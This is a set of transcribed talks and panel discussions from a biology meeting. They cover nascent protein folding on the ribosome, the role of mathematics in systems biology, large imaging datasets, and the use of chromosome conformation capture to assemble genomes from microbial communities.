I think Jim mentioned that autophagy is just another way to degrade proteins. He didn't say that it's another form of assembling compartments. The idea that you use ubiquitin to tag proteins and then clear them in lysosomes — one could argue that this was shown by Ciechanover and Hershko and Varshavsky. But I agree that what Ohsumi did was basically come up with a whole pathway. It turns out that this pathway is so crucial for so many physiological processes; it goes beyond just taking something inside a cell and throwing it into a container. That is not the case. He can say whatever. We also said openly that protein transport — we kind of know everything about it. It's not true. But I think if you challenged him one on one, he would admit that we don't even know what happens when a vesicle fuses. A vesicle is fusing to the target membrane and there is this pore that expands; how that pore expands is not clear, and it's a very major issue. So I think loose talk is very easy, and you can say, yeah, we kind of know everything. People say the same thing about transcription, and every time you find out — jeez. The question is what you want to know about the biological system. For instance, Randy Schekman says, I want to understand it at the atomic level. I'm not interested in the atomic level — I think it's fantastic, but what I need is enough knowledge to predict the behavior of the system when we perturb it. So that problem means dynamic relationships between edges and nodes, and then you have to define them better. But the ability to predict responses quantitatively when we perturb a system — that's what we want to know. And I think this is the problem. It calls for a physics-like approach. Just a comment on what you said about systems biology and complexity. I think that systems biology will continue to be disappointing for many years because we just don't know enough. That's the whole point. So I want to agree with the panel that we are still scratching the surface of many things. We're still getting a lot of surprises in terms of functions and moonlighting and all the rest of it, in terms of protein activities and functions. On the other hand, you have to start somewhere and you have to start trying. So if you go into systems biology, you know you're prone to fail, but there are small advances that will eventually add up. It's just trying to get a model of one simple cell — a mathematical model of a simple cell — to predict behavior. That's the ultimate goal. We're so far away from that because our technology is just not there, and we're just ignorant. I think we started talking about systems and systems biology far too early, so it was bound to be a big disappointment. But I think it's the way. And drugs — it's the same principle. We just don't know enough about the system, so you cannot predict. If you could predict, the pharma companies would be a lot more efficient than they are. But you keep making drugs, right? Well, yes. So again, that's not a reason why there shouldn't be pharma companies, and we're achieving some success. It's exactly the same with systems biology: you're achieving a little bit of success, but you cannot expect to solve the whole thing. Then the mathematicians will eventually come to save us. That's the hope we have left. One of the problems of systems biology is that there is a divide, a separation, between modelers, mathematicians, and real biologists. And I say real biologists.
It's important really to fuse the two — to know exactly what a model means in terms of the molecules, the functions you are familiar with. Otherwise, they're going to be models of what? You need both that and the classical nuts-and-bolts biology. Yes.
|
Combining classical and molecular genetics to decipher cellular pathways and mechanisms
|
10.5446/50901 (DOI)
|
So what questions really do you think you can solve? What's next? Because, as Tommy said, it's like a driving hypothesis. You have the ability to do it, so what are the next questions? So I think the big aims we have at the moment are twofold. One is to try to understand translocation events. But on the simpler folding level, it's to try to understand the misfolding processes that occur. In the same way that you have folding processes beginning on the ribosome, you also have potential branch points for misfolding events to occur. So there are decisions to be made for a nascent polypeptide. And as has been studied for a range of isolated polypeptides, the idea would be to understand how the cellular machinery — in particular the ribosome surface, which I suggested today behaves as a chaperone for a nascent polypeptide — can potentially chaperone the polypeptide to avoid misfolding processes, in particular in tandem repeat domains and many other repeat domains that occur, but also in misfolding-prone sequences. There are a range of cases where, of course, you have single point mutations that alter not necessarily the native structure of the protein, but the dynamics that are sampled by the protein. So the idea would be to understand these processes as they occur during biosynthesis. And there's already significant evidence to suggest that protein misfolding is occurring on the ribosome: up to 15% or more of nascent polypeptides are targeted for ubiquitination and degradation as a result of misfolding events. There's a significant amount of stalling that occurs on the ribosome, and there is machinery, the listerin machinery, that comes in, separates the two subunits, and targets the nascent polypeptide for degradation. So understanding these events, I would imagine, would be the next frontier for us. So you're talking about folding back on the ribosome, and that maybe helps. And you made mutations — what, in the protein and on the ribosome? Did you check your mutations on the ribosome with proteins other than the one that you showed us? And do they affect them in different ways? So we haven't done that. There's actually a paper on bioRxiv that's just come out showing that, by taking out some of the ribosomal proteins such as L24 and L23, you can alter the position at which an emerging nascent chain begins to fold on the ribosome in a similar way. Now, the purpose of these proteins is unknown. There's a high conservation between prokaryotic and eukaryotic ribosomal proteins at the exit tunnel, but their influence on folding appears to be unknown as of yet. So all the quality-control branch points for misfolding that you talked about were actually things that were worked out in eukaryotes, like the degradation. And you've been working almost entirely with E. coli ribosomes so far, right? Not entirely. The work I didn't actually show, on misfolding events, was on eukaryotic ribosomes, in particular yeast ribosomes and rabbit reticulocyte lysates, where we actually see more of these misfolding events occurring. Yeah, that was actually my question. How much? I didn't realize you were able to do it with eukaryotes. The eukaryotic ribosomes are clearly more complicated than the prokaryotic ones, but that's mainly in the initiation machinery — translation initiation is obviously more complicated in eukaryotes.
At the exit tunnel of the ribosome, there's actually a significant amount of homology between all of the ribosomes. And actually, in some of the CRISPR targeting that we did, we targeted the very small extent of differences that exists between the eukaryotic and the prokaryotic, to try to examine some of these events, and some of the shifts in the initiation of folding do seem to be reflective of the differences between eukaryotic and prokaryotic ribosomes. But certainly, as you may imagine, for the structural biology, in particular the NMR spectroscopy associated with them, doing things on E. coli ribosomes is significantly easier than being able to produce these translation complexes, these nascent chain complexes, on the human ribosome and so forth, where we need the specific labeling to happen. But electron microscopy is changing much of the face of that, where we can take a range of relatively crude complexes and be able to make classifications from a range of states that are being observed. So we'd be working with eukaryotic ribosomes, which is certainly the way forward. Sorry — what about the secretory proteins? We don't have this interaction with the surface of ribosomes. Do you think there's something replacing it? Well, I mean, I'm assuming, for example, in the serpins that we work with, in the microsome systems that we use to examine these, we see some extent of similar interaction with the surface of the microsome. We don't know whether it's specific to the ribosome. I mean, these things, as I was saying earlier, are pitifully under-investigated. And I pretty much showed you the state of the art today in looking at E. coli ribosomes with simple immunoglobulin systems at high resolution. So these are really things that need to be investigated in the future. Can I just comment on this? Oh, yeah. So, Aaron, you're talking about proteins which are inserted into membranes. But this is co-translational. If it happens co-translationally, the SRP immediately binds — this is the textbook thing. So the signal is recognized by the SRP and then it immediately takes it, so it doesn't go through this. And then once it's injected into the lumen of the ER, there will be the chaperones of the ER to help it fold. I mean, but there are chaperones even on the cytosolic side, for example, in many of the systems we work with. Trigger factor, for instance, is omnipresent and actually at higher concentration than the ribosome, but doesn't influence the folding equilibrium at all in the states that we've examined. So it's not necessarily the case that the chaperones will come and mop everything up. I have a question for you, John, and for you, Tommy. We're listening to the first talk and the last talk of today, and I think an important aspect is going to be to bridge from the structure to the interactions, especially for those proteins that assemble on the surface of membranes, which is what you talked a lot about. So what do you think it will take to be able to look at those interactions in terms of structure and dynamics? So I think, at the level of snapshots, there are already quite interesting efforts doing cryo-EM directly in cells — there's cryo-tomography happening, which is quite impressive. So I think the snapshot part can be done even with today's methodology, when you're looking at things in cells, right?
On the dynamic side, at least the part that I can bring is that we can visualize where the molecules are. Sometimes you can put in sensors that can give you some information, maybe even on folding — you can maybe do some FRET or something, right? I think that's possible to do now. So I think it's possible, it's happening. I agree. I think that the technique that can really give you a strong understanding of dynamics is NMR, and it can really tell you about very low populations of intermediate states on folding and misfolding pathways. I think traditionally NMR spectroscopy has been a technique of purists, who have tended to prefer to develop very complicated pulse sequences on small ubiquitin-like molecules. And I think what I quite like about the things that we're doing is that we're beginning to use NMR on increasingly larger systems, and I think that is what's going to allow the bridge with some of the work we've seen. Because in terms of the exploration of large molecular machinery, NMR is typically in its infancy, and higher magnetic field strengths will begin to turn the corner in this regard, so we can begin to provide highly complementary data to that. And I think working more closely with people — I came and I was very, very impressed with these talks, I think with everyone's. And I think that the capacity to bridge the resolution scales would be absolutely mouthwatering. I just have a question, right? I mean, I brought it up during your talk. The experiments that you're doing are still ensemble experiments, right? And so I am still confused, when I'm looking, let's say, at the various states that you had, whether all of them were homogeneous or you were looking at different subsets of different molecules. That wasn't really clear to me, right? That's why we were trying to get at the time connection between the snapshots that you were showing. So maybe you can comment on that. So in terms of the electron microscopy that we're doing, we clearly have various classes of the nascent polypeptide that we're seeing in different states. They, for example, form the basis — just alone, they form the basis — of a simulation where the system is started off and is restrained according to these sets. Now, the problem with timescale then goes even further when including the equilibrium NMR data into the process, and NMR has traditionally been a case where you have a set of restraints: you say this distance is so-and-so, and you have a myriad of those types of distance and angular restraints, and you feed these into a structure determination with a view towards achieving a minimum in the normal way that you know about. The way that this is achieved is normally through a molecular dynamics simulation that has a time element associated with it. But these things can be reconciled in sort of biased, restrained molecular dynamics methods, and this is a massive area of NMR spectroscopy that is absolutely routine at the moment. Does that answer your question somewhat? Thank you so much. Any more questions for John? If not — because he needs to catch a train. I'm very sorry, I really, really enjoyed this meeting so much, but I should get back for my own... Give it to her. Thank you very much. Bye-bye. Okay. Do you want to ask him a question? We can ask a general question. Please. Yes, for them, so that they can record. Ah, no. Then, of course not. I don't want to be recorded at all.
Actually, the question is connected with the fact that this nice, very deep and interesting biological meeting takes place in the Mathematical Institute. So, I have a general question to all of you, maybe except the last guy. But still, somehow, it can be applicable to him too. The question is, can you formulate a... Not mathematical, but theoretical question inside your work, inside your subject, on which you can't answer by biological methods only, and for which you need application of some mathematical methods. Not like data analysis, which is statistics, and we all know how it is useful. But exactly mathematical approach, which will answer some question which you have and which needs this approach. So, it is a question for each of you to formulate such theoretical question, or to say no, we don't have, which is also okay too. Please. Start from you and go this way. Okay. I couldn't have lunch today, because... And you already answered, please. Because I talked to Misha one, Misha two, and Andrei, and also I think you're in the discussion at lunch, right? All the Russians, you were not included, because you were... you went away. So, the discussion we had had to do with image pattern recognition, right? So, we have all this data, it's very nice to look at it, right? And how the hell do we now get information out of that? No, but you didn't say... okay, you... You say it's general, whatever, but you don't... okay, it's very nice to have a... No, I can tell you......a range of pattern recognition, but again, what biological... it is nice to formulate... I'll tell you, I'll tell you. Yes, this is exactly my question. It's a biological question, not like a tool to pattern recognition. Biological question, on which your pattern recognition you answered? Why not? No, no, of course yes, of course... no, why not? Yes, but this is not my question. Imagine that I will look... Imagine that I'm going to look at every cell in the brain, okay? And I want to see all the organelles of every cell in the brain. So imagine that I map every single organelle from every cell in a tissue, and now you can look at different responses that the tissue has to pathophysiology, to the standard cell biology, and you can do that without putting markers on that, so you just look at general way of imaging, and you can recognize all the organizations inside the cell, right? So I wouldn't have to generate these specialized cells, I wouldn't have to do transgenic things, I mean just general. And then I can go and do cell physiology, for example, at high level of detail. You don't like that? I don't have to like it. I accept your answer. Okay, I'll give you another one. I'll give you another one. Another one. In the brain, when you're developing the neurons, right? There are cells... What? Stop! Okay, talk to me. Okay. So, okay, you're developing your neurons, not your, but she's... She was developing your neurons. And there's cell fate decisions that are taken, okay? Okay, so now you have an outcome which is the cell... You're getting a neuron of a certain type or a cell of a particular type, but there were signals that happened that said, okay, go to that direction or that direction. Now, up to now, when we have been mapping the signals, they tend to be typically by genetic means, right? You interfere with a pathway and you look what the response was, right? You have the notch pathway, which is a signaling form. You eliminate that and you see, okay, the animal goes gaga, right? 
And you decide, okay, the neurons doesn't work. That's very primitive, right? I mean, that's okay up to now. But imagine that I can now follow the actual functioning of the pathway. I can follow exactly the where the molecules are. I can tell how many molecules got activated, what regulation went on in gene transcription. And then that is happening at the second level. The cell fate decision and the outcome happens hours after, right? How can I integrate that in the same setting from beginning to end? That's non-trivial. But that's biology in action. Let's say mathematical formalization or mathematical model can give you an explicit answer on this question. I have no idea. Maybe I just don't know. I mean, the only thing I know is that when I was showing you this data, I was showing you this... Oh, no! Can I go on? Wow. Can I finish my... So, I was showing you, for example, this lipid sensor business, right? So this is actually the result of a lot of molecular interactions, binding constants, rates, et cetera, right? So it's very nice that I can say this by words, right? But is this really true? So we had to simulate, you had to make models. Now, maybe for you that's very simple. These were differential equations, et cetera. For me, it's impossibly hard, right? So I need your help. It's not that simple at all, but I still... No, thank you very much for your answer. It's very important and interesting. The only thing that I still did not catch the explicit question. You said that it will be nice, but okay, but never mind. It's me. You answered very well. Thank you. So, let me translate from the rest of the... No, no, no. You will never go to other people. I also want to ask a question. But I think she's asking for falsifiable hypothesis that kind of falls out of the data. What data? A falsifiable hypothesis. What kind of falsifiable hypothesis? Well, something that... Is that true? That's something that falls out of the data and you... Oh, falsifiable hypothesis. Yes. No, it's not a falsifiable hypothesis. It's falsifiable. Yeah, of course. But how can I do that unless you... Help me. Yes, yes. This is... Yes, yes, yes, but still... Yes, I understand. But... Well, frankly, I'm not quite sure I want to answer, but let me try. So, let me give you some very concrete examples. And I'm probably going to get in trouble with a lot of people for saying these things. But for example, in trying to understand in the context of small molecule drugs, where they go in the body, drug distribution, what the bioavailability of those compounds are, they're very large data sets. And we have very simple rule of thumb kinds of rules for what kinds of processes are. But I think models that are based on large data sets, parameterizing those structures, those properties of the compounds, would be very desirable. I mean, I don't see that as a mathematical problem so much as a way of formulating and structuring the data. Now, I'll go to... Getting even more trouble, but I think that there are large fields of biology where mathematical formalism could help a lot. Evolution being one, where I think that having more formal definitions would be helpful, development, those kinds of problems. I have no clue how to start working on those things, but I think that these are areas in the future. 
You also explained how it could be useful in general, but my question was: do you yourself have some very interesting, very precise question which you can't answer by biological means only, and which requires the exact involvement of some mathematical methods to answer — one explicit question of yours? And I'm well aware that mathematics in general is very... I asked exactly about your question, in your field, in the work which you presented today, and not in general... No, so a very specific answer: using databases of hundreds to thousands of compounds for which we have a known property, say bioavailability — how can I use that data to predict a new compound which has equal bioavailability but some other property that I wish to have? So I think that these are existing data which are not fully analyzed, and which, if they were, would help greatly in our work. So, in other words, you would like, for example, to have a tool in which, as an input, you have some described and formalized property, and, having the databases and applying this tool, as an output you get which of these compounds meets the expectation for this... Prediction of new... prediction of new, non-existing compounds which have either better or shared properties. Okay, yeah. So I'm not going to give you any answers you find satisfying, I know that. Don't expect that — I'm just asking exactly: do you have such a question? Yeah, I mean, so... Why should you have one? This problem we're working on with Wolbachia — how they affect the reproductive behavior of the progeny, in females and males, the differences in infection — those things are at a very primitive stage in terms of understanding just the molecules involved. But at some point we'd like to know — people have models, there are a lot of evolutionary biologists working on Wolbachia — what percentage of males needs to be infected before it becomes an advantage for females to have, basically, a defense against that by being infected themselves and having an antidote. I'd like to be able to link that with the molecules that we have: if we know what the concentrations of those molecules are, and when they get in, how can we relate those molecules to the predictions based on very broad evolutionary arguments about what's required to establish an infection? Yes, yes, of course. I mean, I always get puzzled by that type of question. So one part is: is it that I need theory, mathematical theory, or is it that I'm looking for help with computational methods to formalize things? And I must confess that at the beginning I thought it was the mathematical-theory type of thing; I've shifted, and I just feel that right now what we need is help with the formalism and the computational part, right? Which is a practical thing. I mean, biologists don't get trained to do that, and the people that went through that path don't get that way of thinking. And I think this is something we need, right, whatever it's applied to. I'm more interested in questions formulated in a way that they really seek some theory, as you say, and less computational. So for the problems that I have right now, for myself as a biologist, I feel the field dramatically needs help with the practice. Yeah, I think the evolutionary side — someone mentioned that — that's the traditional area where there's real theory, right?
And then a lot of the stuff we're doing is dealing with statistical models to try and say, is this unusual or, you know, something interesting. So in the genotype-to-phenotype thing, you have all these potential interactions, but you never know if the network that you map is just a random thing, or if it's something that really is enriched for those interactions that suggest certain pathways are connected and associated with a phenotype. And it's hard for us to solve that problem. But I don't see any theory, math theory or, you know, axioms, coming out of it. I think this is a question kind of for everyone, but mostly three versus one. I'm just curious — not really, not really, I'm just kind of curious how, yeah. Wait for the question. I'm curious how — I think that a lot of microscopy people see things as 'seeing is believing', that you can really understand something that way, rather than through a genetic interaction model. You guys are studying interactions not necessarily through microscopy. So I'm kind of curious how you feel about the microscopy going on in Tomas's lab, and then vice versa. If you think the microscopy is more powerful — how do your different ways of looking at interactions compare? What are the pros and cons? I'm going to grab the microphone and correct you. It is seeing is perceiving, not believing. We have to be very careful, meaning that seeing has a very powerful impact on our brains, on the way we think. And I think that can be useful in that it can persuade us to think again about something that we thought we already understood. It can revise our views on something where we have very strong preconceived notions. And I think that's very useful in science, because often we sort of get stuck in a rut and we need a large jog in order to get away from that. So I think that that's where imaging has such a powerful role. But it is also just one tool. Well, the point of parking lots for molecules was brought up: how do we know whether what we're looking at is an active state or a biologically relevant state, and so on? So we have to be careful about the biases that we bring to the experiment, because they can have a powerful impact on how we interpret the data. So my answer will be less philosophical, and just to say, first of all, that it's not the three of us against Tommy. I mean, we actually all use microscopy in some way or another; we just don't use such sophisticated microscopy. So even we are interested in where the molecules are as part of understanding how they might be working in the cell. It's part of knowing their concentrations, knowing when they appear and how they interact with each other. So it's just one part of the understanding for us; it's not the only way of looking at things. But Tommy's point of view now is that there are so many things that we never even thought of thinking about or perceived before; just seeing something so new is a way to think about new areas of biology. So I think microscopy has lots of nice functions in terms of promoting new ideas and new ways of thinking about things. I'm supposed to say something. Are you sure those are coming? Yeah, yeah, yeah. Look at the size of it. I mean, the yeast model system is built largely on cell biology and genetics, and we try to do biochemistry as best we can. So I think you need all those things to really figure something out. And now obviously computational biology is the other component that is really driving everything.
And when you put it all together, then you might be able to figure something out, right? Why did you ask that question? I think because — I'm wondering if you feel like this technique is powerful enough at some point. I mean, okay, so with biology we were doing all kinds of stuff because we actually can't see what's going on a lot of the time, so we could skirt around the problem by doing knockouts or whatever. And so I was curious whether you felt like future biology lies in these super-high-resolution imaging techniques. So, before the anatomists existed and started doing their sections, there was a perception of what life was, right? An animal or a human, right? And then those guys cut and looked and they started to have thoughts. Of course, that was a dead thing, right? But it was influential, right? So they were looking. It didn't define things, it wasn't the last word, but it gave you a mindset from which you can then keep moving again, right? I think this is the same. I mean, I think it's not one or the other. It's as he mentioned right now: you use all these methods, you glue them together. Each one has properties that allow you to do things better than the others, right? When you're doing the imaging, you cannot see the whole global system. It's impossible, right? There are too many variables. Right? So there are different ways in which you handle this large scale of information, and you keep dissecting to try to integrate at the end, right? As it happens, there's a burst right now in this imaging, and this burst happens to be in optical microscopy. And I don't think it's the last word. I think it's just a burst, right? Same as electron microscopy with cryo-EM — there's a spike right now, right? Etc., right? It's a process that keeps evolving, right? And the previous spike was in CRISPR. Each field just keeps... So this is — I have a follow-up, kind of. I don't know if all of you will have an opinion on this, but right now I think one of the few things that microscopy can do really well is chromatin stuff, looking at the dynamics of chromatin. And I'm curious whether you feel like — I don't know, I feel like Mark, maybe, because you have this nucleus, maybe you'll have to move into doing some of that. I don't know, chromatin immunoprecipitation sorts of things. And then I guess with the microscopy, how can you — do you think that it will ever move forward enough to hit that, to go that deep? I can just tell you that a few years ago I was fascinated by splicing. I had a friend of mine in Lisbon, Maria Carmo-Fonseca, and I said, hey, Carmo, can we just look at splicing? So she developed a system, and then we managed to follow splicing in real time at a single locus, and its coupling to transcription, right? And that was done by imaging. There was a huge amount of background before that, based on biochemistry and genetics, but there was also lots of discussion on whether these things were correlated or not, and the experiments were done as ensemble experiments, right? So suddenly, when you were able to look at this and really see it — oh my God, they happen to be coupled. And okay, some people had postulated that and some people were against it, okay? No more discussion, right? I think it depends on the problem, depends on the time.
I think what you're saying is fascinating that people trying to do that, just trying to map where transcription factors are coming and the kinetics and dynamics and how they're walking through. And yeah, I think it's, yeah, lots of new cool things. Yeah, following up, unless there are other questions. I think that there are sort of two kinds of processes that we can look at. We can look at bulk processes, which are fairly easy and usually amenable to ensemble methods. But then if we want to look at, if you will, specific processes at a specific genetic or cellular locus, then we need imaging or other tools that differentiate them from everything else that's going on. So I think that's where the power lies. And well, I certainly have a bias toward things that have to do with genomics because that's my background. I can think that other people who have interesting endocytosis or other things see unique places and want to understand what happens exactly here, not just everywhere. And that spatial temporal information is really powerful in understanding biology. I'll pass. Can I? I'm not sure this is working. Oh, it is working. Oh, great. So I was wondering about two related things and it's a question for some of you more than others, I guess. So there is this giant mountain of amazing data that's coming out. But I would argue that it is mostly available to people who produce the data, and then maybe a little bit to colleagues after it's published, but it's very hard for mathematicians, computer scientists, to get access to this data and play with it. So I'm wondering first, would you say it's important to invest into making this data very available for non-specialists, necessarily? And the second part of this question is, when you're looking at this, this is awesome complexity, this data. And we get to more and more and more layers of this awesome complexity. Would you expect that ultimately when we have maybe mathematical apparatus, maybe new language, new ways of looking at it, it would simplify? Is it your expectation that it looks so amazingly complex because of the units that we choose, cells and genes and units that we choose, molecules? You see what I'm saying? Is there expectation that once we understand there are laws which would bring it to beautiful simplicity? No, I think for sure. I mean, it's in the ultimately, like with the endocytosis model we saw today, it's simple chemistry that's driving it, but there's a lot of moving parts and you have to figure out what they are and then come up with a model, and then ultimately you should be able to formalize that. And so I think it ultimately will be very simple, but there's a lot of moving parts. That's a practicality, right? That's a practicality. The movies I show you today are the small movies that we have. There's a 30, 40, 50, 60 gigabyte, each one of those movies. Those are the small ones. We have data sets that are a third of a terabyte. One movie, we have a data set which is 14 terabytes. Tell me how do I, I mean, forget about putting in a database, right? Inside the lab. I don't even know how to look at these damn things, right? So we're having a major, major problem and this happens to be in our site. I think the same is with other big data things. So one day it will happen. I think maybe the answer is to have games. So there will be games for kids and they will use large terabytes of data than things could solve, right? I don't think that we can drive it based on science. It has nothing to do with compression. 
This is not a compression problem. Look, I have a movie like the ones I showed you, right? And I would just like to see — I would like to be inside this fish and I want to watch the cell crawling towards me, okay? I don't know if you already managed to download this YouTube thing, because I think the internet is slow here; you will see that, right? But we tried to do that in the lab. It's been very, very hard just to do the math, to do the VR, etc. It's non-trivial. I mean, you were asking me about mathematics: the data were all collected at the same intensity, but I now need to make them translucent, with gradients, right? This is a mathematical problem and I don't know how to solve it. And when I talk to people, they all look at me and their eyes glaze over, right? So, yes, we need that. Alright, one final question here. Okay. I want to move away a little bit from the mathematicians, to the theme of this conference: it's from molecules to cells to human health. And you were defining today where the block is in these steps from a molecule to a cure. And one of the things is that we cannot yet predict how a drug will act in a body and what type of effect it will have on different systems. And now Tommy is showing these beautiful movies in which you can see multiple cell types and follow individual molecules. So could it be that this next generation of movies and imaging could help us to overcome this step, by looking not just at the effect on one cell, but at the effect on a system or a couple of cell types, maybe more complex structures like organoids, or different models that are now used for personalized medicine? So, what are your ideas on that? Well, certainly I would say that assays in more complex experimental systems are desirable. High-throughput assays when possible — high throughput in this sense means thousands, not millions, because animal experiments, in order to be reproducible, take quite some resources, and those resources are rarely available to academics, and in drug companies they're becoming less and less widely distributed. I don't really have a solution; that sort of high-end imaging approach is appealing, but again, today, it is rather low throughput. I mean, when it takes a day or two to acquire a data set, it's not something that we can routinely dedicate to high-throughput kinds of studies. So I'm afraid I don't have a simple solution. I guess one solution that I would offer is: let's try to make sure that the data we do have are widely available and in accessible formats, such that information that is perhaps in the literature but not very organized, not in a format that is usable for most people, becomes more so, so that it can be used. So I'm sorry I'm not able to answer in a more optimistic way, but I think that the challenges are great. Maybe the institutions that are in charge of funding need to think again about whether there are ways of making such data more widely available and collecting it. So, we're actually doing an experiment that tests, that follows, what you just said, right? We happen to be looking at infection, viral infection, and that has a biological problem, because when you infect, you present cells with viruses and the number of particles that a cell sees is very high, right? The MOI is very high, right? So only one or two viruses will infect, but maybe hundreds of particles bound and were taken into the cell.
So, now you want to see a drug that is interfering with infection. You know that that happened because you did the high throughput screen and it's fine, and you even know what the target is, you know everything, right? Now you would like to see what's going on, right? I think that the only way is to do the imaging, and we're doing exactly that, right? So, we track in many cells hundreds of viruses, you put the drug and you say, okay, where did I get the block and what stage, et cetera, right? It's a huge computational, I mean, very complex computational. It's non-trivial, right? But it's possible and it's happening, and I can see that we already, there's a virus called rotavirus, right? They give you diarrhea to the kids. So, we unravel the pathway of entry of the virus that way, right? It was confused because people were thinking they were taking in by endocytosis, and it turns out that that's not true. Particles are taking by endocytosis. The majority enter by endocytosis. A few particles are trapped in the plasma membrane and that's how they penetrate. No way you could have done it unless you see, right? So, that's my pitch, that. You see I'm a salesman. Well, I could tell you a story. So, I did my, just because we're mathematicians here, right? I did my undergrad, 50% in math and 50% in chemistry. And then a bunch of biology on the side. And I studied math because I knew I was really bad at it and I didn't, I wanted to learn something at university. And then at the end of my degree, the chair of the math department called me into his office and said, and you could tell, you know, they could tell that I wasn't a mathematician because I wasn't the sensitive ponytail guy. I wasn't, you know, reading a novel during my fuzzy logic class, like the brilliant daughter of mathematicians, friend of mine. Anyway, he said, you're not going on in math, are you, Charlie? And I said, well, no, like, you know, there's just no way. And he goes, okay, well, we don't want to slow you down your other career. So, we'll just bump this mark up a little bit. And if you promise never to take another math course, you can graduate today. Sadly, sadly, this I'm afraid is not a unique or unusual experience. Biologists do tend to have a fear of numbers and a fear of, well, the sort of challenges of mathematical formulas. Okay. Thank you so much.
|
John Christodoulou (UCL, UK) Charlie Boone (UToronto, CA) Tom Kerppola (UMich, US) Mark Hochstrasser (Yale, US) Tomas Kirchhausen (Harvard, US)
|
10.5446/50902 (DOI)
|
So first I want to thank you for this invitation. This is the first time I've come here, though I used to live next door, in Gif-sur-Yvette, near Orsay. So yeah, I'm a local, but I had never set foot in the institute, so I'm very pleased to be here today. Thank you for this opportunity. Today I'm going to talk mostly about a technique that we have developed in my team. My team is mostly interested in the functional folding of genomes — mostly bacterial genomes and yeast genomes. But by working on these topics, we found that we can actually exploit the quantitative measurement of physical collisions between DNA molecules to overcome limitations that exist in genomics and metagenomics. So we do not come from the genomics or metagenomics field, but part of my team is now working on these approaches by developing new methods, and I will show you today how this works. Something common to all ecosystems in the world, whether it is the gut of a mouse or the mangrove in the French Caribbean, is the fact that they are colonized by complex, heterogeneous populations of microorganisms — mostly bacteria, but also yeasts, worms, a lot of different species. And these communities of organisms have important roles in many fields: for instance, the production of oxygen, recycling of matter, depollution, bioenergy, etc. So they can have industrial importance or just biological relevance. Therefore it is quite interesting and important for a lot of people to try to decipher the content of these communities — to find out which bacteria are there and what the genomes are — in order to understand the maintenance of the equilibrium of the ecosystem. I'm going to switch here, because there are more people here than there. So, to understand these ecosystems, a lot of people are interested in describing them as precisely as possible, to the full extent of their complexity. You have many species coexisting together. You can also imagine you have phages, viruses, mobile elements that can be exchanged between some of these species. So it's quite important to be able to describe the structure to the full extent of its complexity. And this is where the field of metagenomics emerged, at the convergence between genomics and sequencing — very technical fields: how do you explore genomes, from their structure down to the sequence, with high-throughput sequencing — and the question of the diversity of microbes in the wild. So metagenomics is a field that consists in sequencing DNA from the environment and trying to find out which species coexist with each other and how they co-evolve or coexist over time. These studies provide some hints about the genetic content of an ecosystem and therefore also some hints about the balance or imbalance of the community, and you can actually work on many things with these approaches. The way it is done so far is by extracting DNA from the population, from the ecosystem you are looking at. You basically just extract DNA molecules that belong to different genomes, different organisms, and you do genome sequencing on this mix of DNA molecules. You sequence a lot of short reads, or even longer reads, and you end up with a big picture of the DNA present in the population. And to improve things a bit, because you don't know which molecule belongs to which organism, you can try to extend these short DNA reads into longer DNA sequences that are called contigs.
And still these don't represent full genomes, because of the limitations of current assembly programs and because some of these species share identical sequences, so the program just fails to isolate the individual molecules from the original population. And it's a very complex problem: you have to imagine some of these communities contain hundreds of species, therefore hundreds of genomes. So it's quite impossible to assemble these DNA sequences into full genomes that provide you a good insight into the original community. So what people used to do is try to pool these contigs, which are stretches of DNA of a few thousand bases, into pools of contigs that group these DNA molecules according to, for instance, covariance across different experiments: you look at the covariance between the amounts of these contigs you obtain after sequencing, so you can pool these guys together. You can look at the GC content, codon usage — different heterogeneous information present along these molecules that helps you to pool these contigs according to specific features. It's a very imperfect process, and usually what you end up getting is many more pools of contigs than you have original genomes in the community. So here, for instance, let's say you have six bacteria; in the end, you will end up with nine communities of contigs — there is a discrepancy between the number of pools of contigs and the number of genomes you expect in the end. So there is actually a strong inability in this field to reach a comprehensive genomic structure of complex communities, and therefore this limits the investigation of the dynamics and equilibrium of these ecosystems. So my team used to work on — I mean, is working on — genome folding. And what we noticed, and I will show you what I mean by that, is that each DNA sequence in 1D has a unique 3D signature in vivo. So we can actually exploit this 3D signature to go back to the 1D structure. Here is how we do it. We mostly use an assay called chromosome conformation capture, developed by Job Dekker 15 years ago, which aims at trapping physical collisions between DNA segments along a genome, according to their collision frequencies inside a population of cells. The way you do that is you freeze the folding of the DNA in each cell by adding a fixating chemical agent such as formaldehyde, which is going to generate covalent bridges between proteins and other proteins, and between proteins and DNA. Therefore, if you have a DNA molecule inside a cell that is folded like this, with a protein complex here, you will generate covalent bridges between these proteins and the DNA, and therefore you will freeze the folding of this molecule in this cell. So if you have billions or millions of cells, you have a population of frozen structures like this in your mix where you add this chemical agent. Then the trick is to digest these DNA molecules. You end up with restriction fragments, short pieces of DNA that are still fixed to each other according to their frequency of collision inside this population. And then, when you add an enzyme called ligase that is going to re-ligate these two restriction fragments together, you will end up with a molecule that is chimeric with respect to the original genome, but that reflects the fact that these two fragments, red and black, were actually close to each other in 3D space. Okay?
So then what you do is purify all the DNA molecules, and you end up with a library of DNA molecules where restriction fragments — DNA segments that were close to each other in 3D — are joined. How big a segment does your restriction give? It depends on the enzyme you use, but they can be between, let's say, 10 base pairs and 2 or 3 kb. If you use a frequent cutter, it will be mostly between 20 base pairs and 200 base pairs. If you use a 6-cutter, an enzyme that recognizes 6 base pairs, it will be between 500 base pairs and 3 kb, and it depends also on the GC content of the genome, so there are a lot of parameters at play, but usually it's around 1 kb, let's say, on average. For a long time, the limitation in this field was to quantify the respective amounts of these events, because if you are able to have a global overview of the respective amounts of all the re-ligation events between all the DNA segments in the original population, then you would have a global overview of the average folding of the genome. That was the theory. And that was actually solved with the advent of high-throughput sequencing, like Illumina sequencing, where basically you just plug sequencing adapters onto the edges of these DNA molecules, you sequence one end of the molecule and the other end, and now you simply count how many times you found in the library, for instance, the green fragment re-ligated with the blue fragment, and actually with all of the other fragments of the genome. Therefore, you have the respective contact frequencies of re-ligation between all the restriction fragments of the genome with each other. And this allows you to generate heat maps, contact maps, that reflect these respective ratios. So this is an example for the bacterium Vibrio cholerae, which contains two circular chromosomes summing to approximately a four-megabase genome. Here are the chromosomes, represented in their linear form. When you plot the contacts of all the DNA fragments along chromosome one with themselves, you end up with this heat map here: that's an intra-chromosomal contact map. This is the intra-chromosomal contact map of chromosome two. Then you can also plot the contacts between chromosome one and chromosome two, and here you have an inter-chromosomal contact map. This heat map is quite representative of what you get when you do this on any species so far, whether it is mammalian cells or bacteria or yeast. You have first a very strong diagonal that reflects the fact that the DNA molecule is a polymer. Therefore, two DNA fragments that are close to each other along this polymer are going to be re-ligated more frequently than two DNA fragments that are far apart from each other, and therefore you 